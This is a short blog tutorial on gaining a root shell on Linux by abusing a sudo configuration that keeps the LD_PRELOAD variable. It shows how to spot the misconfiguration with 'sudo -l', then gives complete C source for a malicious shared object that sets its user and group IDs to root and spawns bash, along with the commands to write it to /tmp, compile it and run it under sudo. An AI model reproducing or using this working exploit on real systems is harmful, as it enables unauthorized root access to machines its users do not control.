SUDO-LD_PRELOAD Linux Privilege Escalation

ssh tunneling
Linux privilege escalationAll Blog

What is LD_PRELOAD?

LD_PRELOAD is an optional environmental variable holding one or more paths to shared libraries or shared objects, the loader will load it before any other shared library including the C runtime library libc.so this is also called as preloading a library.

To avoid this mechanism being used as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.

Detection

Fire up terminal and type:

[email protected]:~$ sudo -l 
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

If output something like this, congratulations target is vulnerable and you can exploit the LD_PRELOAD issue to get root privilege shell and to accomplish privilege escalation you also need some sudo permission binary which uses LD_PRELOAD envr.

Screenshot from 2018 04 12 17 01 28

some Sudo command which can be done, current user.

Program File :

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Exploit LD_PRELOAD.

open terminal and go to any Writable Directory for dropping shell.

writable directory like 

  • /tmp
  • /var/tmp
  • /dev/shm

in our case we using /tmp directory.

Drop an evil.c using any text editor, here we used cat for dropping shell.

[email protected]:/tmp$ cat << EOF >> evil.c
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
> void _init() {
> unsetenv("LD_PRELOAD");
> setgid(0);
> setuid(0);
> system("/bin/bash");
> }
> EOF

lest Compile and make object file.

gcc -fPIC -shared -o evil.so evil.c -nostartfiles

Time to final step 3:)

sudo LD_PRELOAD=evil.so <COMMAND>

here <COMMAND> mean which command have u allowed to do with sudo.

Screenshot from 2018 04 12 17 28 12
Screenshot from 2018 04 12 17 27 30
Screenshot from 2018 04 12 17 28 23

you can use any sudo command which allowed to current user.

You Got a Shell!!!!!

Leave a Reply

Your email address will not be published. Required fields are marked *